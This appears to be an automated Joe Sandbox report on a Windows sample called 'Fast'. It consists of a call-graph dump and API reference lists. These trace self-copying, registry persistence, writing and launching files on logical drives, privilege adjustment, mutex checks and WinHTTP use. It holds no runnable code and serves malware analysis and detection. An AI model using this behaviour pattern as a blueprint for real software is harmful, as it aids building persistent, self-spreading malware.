d48b6 3994->3995 3996 d3d4b 6 API calls 3995->3996 3997 d48e0 3996->3997 3998 d4925 3997->3998 4543 d5b0e GetModuleFileNameW 3997->4543 4000 d3d4b 6 API calls 3998->4000 4002 d492f 4000->4002 4001 d48ec 4001->3998 4003 d48f1 CreateProcessW 4001->4003 4006 d2c79 4002->4006 4544 d90a1 
GetProcessHeap HeapFree 4002->4544 4003->3998 4004 d4915 CloseHandle CloseHandle 4003->4004 4004->3998 4006->3731 4006->3747 4008 d3c7a 10 API calls 4007->4008 4009 d2954 4008->4009 4010 d6347 2 API calls 4009->4010 4011 d2960 4010->4011 4012 d6347 2 API calls 4011->4012 4013 d296b 4012->4013 4014 d6347 2 API calls 4013->4014 4016 d2976 4014->4016 4015 d29cb 4017 d39da 2 API calls 4015->4017 4016->4015 4545 d620d 4016->4545 4019 d29d6 4017->4019 4020 d39da 2 API calls 4019->4020 4021 d29df 4020->4021 4022 d39f9 2 API calls 4021->4022 4024 d29e8 4022->4024 4023 d29af 4023->4015 4552 d3cbd WinHttpOpen 4023->4552 4026 d39f9 2 API calls 4024->4026 4027 d29ef 4026->4027 4028 d1236 4027->4028 4029 d6347 2 API calls 4028->4029 4030 d124c 4029->4030 4031 d3bb3 9 API calls 4030->4031 4032 d1256 4031->4032 4033 d3bb3 9 API calls 4032->4033 4034 d1263 4033->4034 4035 d3bb3 9 API calls 4034->4035 4036 d126e 4035->4036 4037 d9041 2 API calls 4036->4037 4038 d127d 4037->4038 4039 d9041 2 API calls 4038->4039 4040 d1287 4039->4040 4041 d9041 2 API calls 4040->4041 4042 d1291 4041->4042 4043 d9041 2 API calls 4042->4043 4044 d129b 4043->4044 4045 d9041 2 API calls 4044->4045 4046 d12a4 4045->4046 4047 d9041 2 API calls 4046->4047 4048 d12ae 4047->4048 4049 d1506 4048->4049 4562 d5b0e GetModuleFileNameW 4048->4562 4050 d39da 2 API calls 4049->4050 4051 d150f 4050->4051 4053 d39da 2 API calls 4051->4053 4054 d1518 4053->4054 4055 d39da 2 API calls 4054->4055 4056 d1521 4055->4056 4058 d39da 2 API calls 4056->4058 4057 d12ce 4057->4049 4059 d5b20 5 API calls 4057->4059 4060 d152a 4058->4060 4066 d12f1 4059->4066 4061 d39da 2 API calls 4060->4061 4062 d1531 4061->4062 4063 d39da 2 API calls 4062->4063 4064 d153a 4063->4064 4065 d39da 2 API calls 4064->4065 4068 d1543 4065->4068 4066->4049 4563 d5b7c 4066->4563 4069 d39da 2 API calls 4068->4069 4071 d154c 4069->4071 4072 d39da 2 API calls 4071->4072 4073 d1555 4072->4073 4075 d39da 2 API calls 4073->4075 4074 d5b7c 5 API calls 4076 
d1353 4074->4076 4077 d155e 4075->4077 4076->4049 4078 d1378 CopyFileW 4076->4078 4077->3719 4079 d138c 4078->4079 4080 d1461 4078->4080 4081 d1392 RegOpenKeyExW 4079->4081 4080->4049 4082 d35d2 4 API calls 4080->4082 4083 d13c2 4081->4083 4084 d13b3 4081->4084 4094 d1477 4082->4094 4086 d13d8 RegOpenKeyExW 4083->4086 4570 d3a93 RegSetValueExW RegCloseKey 4084->4570 4087 d13f9 4086->4087 4091 d1408 4086->4091 4571 d3a93 RegSetValueExW RegCloseKey 4087->4571 4089 d14fe 4572 d90a1 GetProcessHeap HeapFree 4089->4572 4091->4080 4093 d143e CopyFileW GetFileAttributesW 4091->4093 4092 d14a2 CopyFileW 4092->4094 4093->4080 4095 d1456 SetFileAttributesW 4093->4095 4094->4049 4094->4089 4094->4092 4096 d14c5 CopyFileW GetFileAttributesW 4094->4096 4095->4080 4096->4094 4097 d14dd SetFileAttributesW 4096->4097 4097->4094 4099 d3bb3 9 API calls 4098->4099 4100 d3c8d 4099->4100 4101 d3c9e GetVolumeInformationW 4100->4101 4102 d3cac 4101->4102 4103 d39da 2 API calls 4102->4103 4104 d2cbc 4103->4104 4105 d1894 4104->4105 4106 d9041 2 API calls 4105->4106 4107 d18a4 4106->4107 4108 d6347 2 API calls 4107->4108 4109 d18b3 4108->4109 4110 d6347 2 API calls 4109->4110 4111 d18be 4110->4111 4112 d6347 2 API calls 4111->4112 4113 d18c9 4112->4113 4114 d6347 2 API calls 4113->4114 4125 d18da 4114->4125 4115 d39b7 2 API calls 4116 d1a28 4115->4116 4118 d39da 2 API calls 4116->4118 4117 d19e5 4120 d1870 2 API calls 4117->4120 4143 d19ef 4117->4143 4119 d1a30 4118->4119 4121 d39da 2 API calls 4119->4121 4120->4143 4122 d1a3b 4121->4122 4123 d39da 2 API calls 4122->4123 4124 d1a44 4123->4124 4126 d1a52 4124->4126 4614 d90a1 GetProcessHeap HeapFree 4124->4614 4125->4117 4127 d5fe7 6 API calls 4125->4127 4125->4143 4130 d1a60 4126->4130 4615 d90a1 GetProcessHeap HeapFree 4126->4615 4129 d1947 4127->4129 4129->4117 4133 d35d2 4 API calls 4129->4133 4132 d1a6e 4130->4132 4616 d90a1 GetProcessHeap HeapFree 4130->4616 4132->3759 4135 d1960 4133->4135 4135->4117 4136 d35d2 4 API calls 4135->4136 
4137 d1975 4136->4137 4137->4117 4138 d1991 4137->4138 4139 d35d2 4 API calls 4137->4139 4138->4117 4140 d35d2 4 API calls 4138->4140 4141 d19a6 4138->4141 4139->4138 4140->4141 4141->4117 4575 d15a6 4141->4575 4143->4115 4145 d9041 2 API calls 4144->4145 4146 d24cc 4145->4146 4147 d2500 4146->4147 4148 d24d3 CreateThread 4146->4148 4147->3767 4148->3767 4149->3782 4151 d3c7a 10 API calls 4150->4151 4152 d1013 GetLogicalDrives 4151->4152 4153 d3bb3 9 API calls 4152->4153 4154 d1024 4153->4154 4155 d6347 2 API calls 4154->4155 4156 d1030 4155->4156 4157 d6347 2 API calls 4156->4157 4158 d103b 4157->4158 4159 d6347 2 API calls 4158->4159 4160 d1046 4159->4160 4161 d6347 2 API calls 4160->4161 4162 d1054 4161->4162 4163 d9041 2 API calls 4162->4163 4164 d1061 4163->4164 4642 d3c29 4164->4642 4167 d3c29 6 API calls 4168 d108e 4167->4168 4170 d35d2 4 API calls 4168->4170 4176 d10af 4168->4176 4184 d11d0 4168->4184 4169 d39da 2 API calls 4171 d11db 4169->4171 4170->4176 4172 d39da 2 API calls 4171->4172 4173 d11e4 4172->4173 4174 d39da 2 API calls 4173->4174 4175 d11ed 4174->4175 4177 d39da 2 API calls 4175->4177 4178 d35d2 4 API calls 4176->4178 4187 d10ef 4176->4187 4179 d11f6 4177->4179 4178->4176 4180 d39da 2 API calls 4179->4180 4181 d11fd 4180->4181 4182 d39f9 2 API calls 4181->4182 4183 d1206 4182->4183 4185 d39f9 2 API calls 4183->4185 4184->4169 4186 d120f 4185->4186 4188 d121e 4186->4188 4649 d90a1 GetProcessHeap HeapFree 4186->4649 4187->4184 4191 d3969 CreateFileW WriteFile CloseHandle 4187->4191 4193 d3e9e ShellExecuteExW 4187->4193 4190 d122d 4188->4190 4650 d90a1 GetProcessHeap HeapFree 4188->4650 4190->3790 4191->4187 4193->4187 4651 d90a1 GetProcessHeap HeapFree 4194->4651 4196 d5996 4196->3670 4197->3678 4199 d2f59 4198->4199 4200 d39c0 4198->4200 4199->3695 4202 d1870 4199->4202 4652 d90a1 GetProcessHeap HeapFree 4200->4652 4203 d187d 4202->4203 4204 d1877 4202->4204 4206 d188b 4203->4206 4207 d1567 2 API calls 4203->4207 4653 d90a1 GetProcessHeap 
HeapFree 4204->4653 4654 d90a1 GetProcessHeap HeapFree 4206->4654 4207->4206 4209 d1891 4209->3695 4211 d627a 4210->4211 4212 d6280 4210->4212 4655 d90a1 GetProcessHeap HeapFree 4211->4655 4215 d628e 4212->4215 4656 d90a1 GetProcessHeap HeapFree 4212->4656 4657 d90a1 GetProcessHeap HeapFree 4215->4657 4217 d62a2 4217->3657 4219 d9049 4218->4219 4220 d904a GetProcessHeap HeapAlloc 4218->4220 4219->4220 4220->3797 4221->3810 4222->3815 4223->3814 4224->3813 4225->3818 4227 d9041 2 API calls 4226->4227 4228 d5b2e 4227->4228 4229 d5b35 4228->4229 4230 d5b77 4228->4230 4251 d5b0e GetModuleFileNameW 4229->4251 4230->3830 4232 d5b3b 4252 d90a1 GetProcessHeap HeapFree 4232->4252 4234 d5b76 4234->4230 4236 d2519 4235->4236 4253 d92e1 4236->4253 4238 d2523 4239 d9041 2 API calls 4238->4239 4240 d2532 4239->4240 4241 d25cb 4240->4241 4258 d25f3 4240->4258 4243 d25d5 4241->4243 4267 d90a1 GetProcessHeap HeapFree 4241->4267 4245 d25e7 4243->4245 4268 d90a1 GetProcessHeap HeapFree 4243->4268 4245->3842 4247->3828 4248->3829 4249->3832 4250->3834 4251->4232 4252->4234 4254 d930b 4253->4254 4255 d92ea 4253->4255 4254->4238 4269 d905b 4255->4269 4257 d92f9 4257->4238 4257->4254 4262 d2607 4258->4262 4266 d2600 4258->4266 4259 d2685 4260 d92e1 2 API calls 4259->4260 4259->4266 4264 d2690 4260->4264 4261 d261d 4261->4266 4272 d35d2 4261->4272 4262->4259 4262->4261 4262->4266 4265 d9041 2 API calls 4264->4265 4265->4266 4266->4240 4267->4243 4268->4245 4270 d9069 GetProcessHeap HeapAlloc 4269->4270 4271 d9068 4269->4271 4270->4257 4271->4270 4273 d35e9 4272->4273 4278 d3612 4272->4278 4274 d3617 4273->4274 4275 d35f6 4273->4275 4273->4278 4276 d9041 2 API calls 4274->4276 4279 d907a 4275->4279 4276->4278 4278->4266 4280 d9089 GetProcessHeap HeapReAlloc 4279->4280 4281 d9081 4279->4281 4280->4278 4281->4280 4282->3872 4283->3873 4284->3871 4286 d92e1 2 API calls 4285->4286 4291 d5ff4 4286->4291 4287 d291c 4287->3892 4292 d3940 4287->4292 4288 d907a 2 API calls 4288->4291 4289 d6055 
4295 d90a1 GetProcessHeap HeapFree 4289->4295 4291->4287 4291->4288 4291->4289 4296 d38da 4292->4296 4295->4287 4297 d38ea 4296->4297 4298 d38f0 EnterCriticalSection 4296->4298 4297->4298 4299 d3939 4297->4299 4300 d38fd 4298->4300 4307 d3915 4298->4307 4299->3892 4311 d2fb5 4300->4311 4301 d3927 4304 d3848 7 API calls 4301->4304 4303 d3848 7 API calls 4303->4307 4308 d3931 LeaveCriticalSection 4304->4308 4305 d3905 4314 d3848 4305->4314 4307->4301 4307->4303 4308->4299 4310 d39da 2 API calls 4310->4307 4312 d6347 2 API calls 4311->4312 4313 d2fc3 4312->4313 4313->4305 4316 d385d 4314->4316 4315 d3887 4317 d38d2 4315->4317 4318 d9041 2 API calls 4315->4318 4316->4315 4319 d3876 WriteConsoleW 4316->4319 4317->4310 4320 d3897 4318->4320 4319->4315 4320->4317 4321 d389e WideCharToMultiByte WriteFile 4320->4321 4323 d90a1 GetProcessHeap HeapFree 4321->4323 4323->4317 4324->3897 4326 d6347 2 API calls 4325->4326 4327 d3d5f 4326->4327 4328 d3d8b GetModuleHandleA 4327->4328 4329 d3d96 GetProcAddress 4328->4329 4330 d3dab 4328->4330 4329->4330 4331 d39b7 2 API calls 4330->4331 4333 d3db9 GetModuleHandleA GetProcAddress 4331->4333 4333->3938 4333->3955 4334->3945 4335->3942 4348 d930f 4336->4348 4338 d4d7a 4339 d4d7f CreateThread 4338->4339 4340 d4db7 4338->4340 4339->4340 4341 d4d96 WaitForSingleObject 4339->4341 4353 d4b85 4339->4353 4344 d39f9 4340->4344 4342 d4db0 CloseHandle 4341->4342 4343 d4da2 GetExitCodeThread 4341->4343 4342->4340 4343->4342 4345 d3a13 4344->4345 4346 d3a02 4344->4346 4345->3959 4347 d39b7 2 API calls 4346->4347 4347->4345 4349 d931c 4348->4349 4350 d9318 4348->4350 4351 d9041 2 API calls 4349->4351 4350->4338 4352 d932a 4351->4352 4352->4338 4382 d3bb3 4353->4382 4355 d4ba5 4356 d3d4b 6 API calls 4355->4356 4357 d4c05 CreatePipe 4356->4357 4358 d4cf1 4357->4358 4359 d4c27 CreatePipe 4357->4359 4361 d4d09 4358->4361 4362 d4d03 CloseHandle 4358->4362 4359->4358 4360 d4c41 SetHandleInformation 4359->4360 4360->4358 4363 d4c57 SetHandleInformation 
4360->4363 4364 d4d0f CloseHandle 4361->4364 4365 d4d15 4361->4365 4362->4361 4363->4358 4366 d4c67 CreateProcessW 4363->4366 4364->4365 4367 d4d1e CloseHandle 4365->4367 4368 d4d24 4365->4368 4366->4358 4371 d4cbd 4366->4371 4367->4368 4369 d4d2a CloseHandle 4368->4369 4370 d4d30 4368->4370 4369->4370 4372 d4d3c 4370->4372 4373 d4d36 CloseHandle 4370->4373 4376 d4ccb WriteFile WaitForSingleObject 4371->4376 4374 d4d48 4372->4374 4375 d4d42 CloseHandle 4372->4375 4373->4372 4377 d39da 2 API calls 4374->4377 4375->4374 4378 d3d4b 6 API calls 4376->4378 4379 d4d51 4377->4379 4378->4358 4380 d39f9 2 API calls 4379->4380 4381 d4d5a 4380->4381 4383 d2fb5 2 API calls 4382->4383 4384 d3bc3 4383->4384 4385 d92e1 2 API calls 4384->4385 4389 d3bcd 4385->4389 4386 d3c0e 4387 d39da 2 API calls 4386->4387 4388 d3c21 4387->4388 4388->4355 4389->4386 4396 d3b33 4389->4396 4391 d907a 2 API calls 4392 d3be3 4391->4392 4392->4386 4392->4391 4393 d3c10 4392->4393 4395 d3b33 5 API calls 4392->4395 4407 d90a1 GetProcessHeap HeapFree 4393->4407 4395->4392 4397 d9041 2 API calls 4396->4397 4398 d3b47 4397->4398 4399 d6347 2 API calls 4398->4399 4400 d3b54 4399->4400 4401 d39da 2 API calls 4400->4401 4402 d3b70 4401->4402 4403 d3b79 ExpandEnvironmentStringsW 4402->4403 4406 d3b8d 4402->4406 4403->4406 4405 d3bab 4405->4392 4408 d90a1 GetProcessHeap HeapFree 4406->4408 4407->4386 4408->4405 4410 d6347 2 API calls 4409->4410 4411 d4566 4410->4411 4412 d3c7a 10 API calls 4411->4412 4413 d4588 4412->4413 4414 d6347 2 API calls 4413->4414 4415 d4598 4414->4415 4474 d3a18 RegOpenKeyExW 4415->4474 4417 d45c8 4418 d39b7 2 API calls 4417->4418 4419 d45ed 4418->4419 4420 d3bb3 9 API calls 4419->4420 4421 d45fc 4420->4421 4422 d6347 2 API calls 4421->4422 4423 d460b 4422->4423 4424 d6347 2 API calls 4423->4424 4425 d4617 4424->4425 4426 d3bb3 9 API calls 4425->4426 4427 d4622 4426->4427 4428 d9041 2 API calls 4427->4428 4429 d4633 GetVersion GetModuleHandleA GetProcAddress 4428->4429 4430 d466d 

      Control-flow Graph

      • Executed
      • Not Executed
      APIs
      • GetTickCount.KERNEL32 ref: 000D2A94
      • GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 000D2AB4
      • Sleep.KERNEL32(00001388), ref: 000D2B9D
      • Sleep.KERNEL32(00000064), ref: 000D2C53
      • Sleep.KERNEL32(00001388), ref: 000D2C82
      • CreateThread.KERNEL32(00000000,00000000,000D239A,?,00000000,00000000), ref: 000D2D55
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D2E45
        • Part of subcall function 000D4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,000D2C6F,00000001), ref: 000D4F95
        • Part of subcall function 000D4F7A: CloseHandle.KERNEL32(?,?,000D2C6F,00000001), ref: 000D4F9E
      • EnterCriticalSection.KERNEL32(?), ref: 000D2EA7
      • LeaveCriticalSection.KERNEL32(?), ref: 000D2EB4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 000D2ECF
      • CloseHandle.KERNEL32(?), ref: 000D2EE6
        • Part of subcall function 000D489E: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 000D4908
        • Part of subcall function 000D489E: CloseHandle.KERNEL32(?), ref: 000D491E
        • Part of subcall function 000D489E: CloseHandle.KERNEL32(?), ref: 000D4923
      • EnterCriticalSection.KERNEL32(?), ref: 000D2F13
      • CloseHandle.KERNEL32(?), ref: 000D2F22
      • CloseHandle.KERNEL32(?), ref: 000D2F31
      • DeleteCriticalSection.KERNEL32(?), ref: 000D2F38
      • ReleaseMutex.KERNEL32(?), ref: 000D2F83
      • CloseHandle.KERNEL32(?), ref: 000D2F8D
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$Sleep$CreateEnterMutexReleaseWait$CountDeleteInfoLeaveLocaleMultipleObjectObjectsProcessSingleThreadTick
      • String ID:
      • API String ID: 2025543672-0
      • Opcode ID: 478bfc91c97f3384abc6bea42b5ee0c3417127077b3ab8d0455733fb0756de23
      • Instruction ID: d949b94196b68bc63bb48c7b147db13ca862a7d79e02378b1f61d00a68dd4507
      • Opcode Fuzzy Hash: 478bfc91c97f3384abc6bea42b5ee0c3417127077b3ab8d0455733fb0756de23
      • Instruction Fuzzy Hash: C2F1A572509342AFDB60AF64984166FBBE5AFA4710F04092FF98492392DB71CD458B73
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6), ref: 000D279B
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D27B8
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D27E3
      • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D27F5
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000), ref: 000D2813
      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D2830
      Yara matches
      Similarity
      • API ID: File$HeapPointer$AllocByteCharCloseCreateHandleMultiProcessReadWide
      • String ID:
      • API String ID: 2550576714-0
      • Opcode ID: acdc214566817b64d428f84326c71c359177ae62f33772f6805bfd17f0210ab2
      • Instruction ID: 74305a18327c4b346f6aace5d2c20196b7e97fe68855425b30e96342631f21ac
      • Opcode Fuzzy Hash: acdc214566817b64d428f84326c71c359177ae62f33772f6805bfd17f0210ab2
      • Instruction Fuzzy Hash: A6417171D02315BEDB21ABA5AC45DEFBFF8EF95711F24012BF500A1252DA324E41DAB4
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      APIs
      • GetVersion.KERNEL32(?,000D2B0D), ref: 000D3E42
      • GetCurrentProcess.KERNEL32(00000008,?), ref: 000D3E58
      • OpenProcessToken.ADVAPI32(00000000), ref: 000D3E5F
      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 000D3E7D
      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 000D3E93
      Yara matches
      Similarity
      • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpenVersion
      • String ID:
      • API String ID: 4059737031-0
      • Opcode ID: e11017a7fcfc2a7985573c719938e61441489b0c90b62fa69e9d5865115b4ce6
      • Instruction ID: b5f7c535e8d40dc740322e010888b519ec37260855ac5862d3d17b042bd4d0ec
      • Opcode Fuzzy Hash: e11017a7fcfc2a7985573c719938e61441489b0c90b62fa69e9d5865115b4ce6
      • Instruction Fuzzy Hash: D0F03C75A01218FBEB519BA4DC09BDEBBB8FB05701F104066FA02E21D0D7749B44DBB6
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      APIs
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
      • OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F1E
      • CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F2D
      • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 000D4F3C
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 000D4F56
      Yara matches
      Similarity
      • API ID: Mutex$CloseCreateHandleInformationObjectOpenSingleVolumeWait
      • String ID:
      • API String ID: 1595014494-0
      • Opcode ID: 2b2cb6ca0e58bdc12da7dacd987a6fd1f8621be6730428bd06704f4441dc06a5
      • Instruction ID: 09901169e8f6a17246cf30480f5565940c721b3c2bae5d70058ce6f275c01ee4
      • Opcode Fuzzy Hash: 2b2cb6ca0e58bdc12da7dacd987a6fd1f8621be6730428bd06704f4441dc06a5
      • Instruction Fuzzy Hash: 5D2190B6A00308AFDB10AFA4DC858ADBBF9FB84354F20443BF585A7311DA749D458B31
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      APIs
        • Part of subcall function 000D4EA5: OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F1E
        • Part of subcall function 000D4EA5: CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F2D
        • Part of subcall function 000D4EA5: WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 000D4F3C
        • Part of subcall function 000D4EA5: CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 000D4F56
      • ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,000D2C6F,00000001), ref: 000D4F95
      • CloseHandle.KERNEL32(?,?,000D2C6F,00000001), ref: 000D4F9E
      Yara matches
      Similarity
      • API ID: Mutex$CloseHandle$CreateObjectOpenReleaseSingleWait
      • String ID:
      • API String ID: 2599181272-0
      • Opcode ID: c070002ccb17989bd0d4e0555969de656eeb5a1c44077f4edc806750db498ffa
      • Instruction ID: 01129b40b97a481746121da6e5b84db39663374327d7009b10ab2b8c5f16d809
      • Opcode Fuzzy Hash: c070002ccb17989bd0d4e0555969de656eeb5a1c44077f4edc806750db498ffa
      • Instruction Fuzzy Hash: DFD0EC72901229BFDF115B94DC0B88D7B68EF017647100161F90562220D7719E1497E0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      APIs
        • Part of subcall function 000D29F5: GetTickCount.KERNEL32 ref: 000D2A94
        • Part of subcall function 000D29F5: GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 000D2AB4
      • ExitProcess.KERNEL32 ref: 000D2FAE
      Yara matches
      Similarity
      • API ID: CountExitInfoLocaleProcessTick
      • String ID:
      • API String ID: 1528680899-0
      • Opcode ID: 7aa59cf980dd832dc41ca93f496a680bc019c41d0d027142bbada03cb6b016c1
      • Instruction ID: 0d37f0003fedabae44422ef7a81d9989957d2918427f6045fe3d1fc734fc3b25
      • Opcode Fuzzy Hash: 7aa59cf980dd832dc41ca93f496a680bc019c41d0d027142bbada03cb6b016c1
      • Instruction Fuzzy Hash: B390022124920197E2803760591E7486A105B16716F044102B505941929D5400105532
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
      • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: 59e412a38a4fc0e081b0da7c3ea6260f7183367ecd224eaec91d415d23fdbe4a
      • Instruction ID: ac6a72a7240c02644a2ed02617665afa63f9294f94532e3331b854f2e6d164f4
      • Opcode Fuzzy Hash: 59e412a38a4fc0e081b0da7c3ea6260f7183367ecd224eaec91d415d23fdbe4a
      • Instruction Fuzzy Hash: 7EE0EC72511224BD662457569D4ACFF7F7CDF82670710005BF90597241E6745F01D6F1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetCurrentProcess.KERNEL32(00000020,+#,00000000,?,?,?,?,?,?,?,?,000D232B,00000000), ref: 000D3DD5
      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,000D232B,00000000), ref: 000D3DDC
      • LookupPrivilegeValueW.ADVAPI32(00000000,+#,?), ref: 000D3DEE
      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,000D232B), ref: 000D3E1D
      • CloseHandle.KERNEL32(+#,?,?,?,?,?,?,?,000D232B,00000000), ref: 000D3E2D
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
      • String ID: +#$+#
      • API String ID: 3038321057-4063140741
      • Opcode ID: bc9f10684c73e13686a51ead17654a2acc78b4901164dd1340059a4270bd9a9f
      • Instruction ID: 6291d21eb3e3b18d1d572b927c9d9d8cc425b01b71544b8d7d35ad56e5a8b100
      • Opcode Fuzzy Hash: bc9f10684c73e13686a51ead17654a2acc78b4901164dd1340059a4270bd9a9f
      • Instruction Fuzzy Hash: 6F011A76A01228ABDB109FA5DC48AEFBFBCEF49751F044026F905E2290D7788645CBB5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 000D5DC6
      • FindNextFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 000D5E9C
      • FindClose.KERNEL32(00000000,?,00000000,-00000002,00000002), ref: 000D5EAD
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Find$FileHeap$AllocCloseFirstNextProcess
      • String ID: .$.
      • API String ID: 719300460-3769392785
      • Opcode ID: e82861458aac04aff6942e1fb638b6e66b43abbbb90d9edfbb13a25c6581f98c
      • Instruction ID: ca7f872757c193c9f1fc3b4823bf174f84cf86aefba1a0e290b113c892b53922
      • Opcode Fuzzy Hash: e82861458aac04aff6942e1fb638b6e66b43abbbb90d9edfbb13a25c6581f98c
      • Instruction Fuzzy Hash: 05317C31801719AFCF25AFA0DC49AEE7BB9AF04316F148057FD04A2252E7758B948FB5
      Uniqueness

      Uniqueness Score: -1.00%

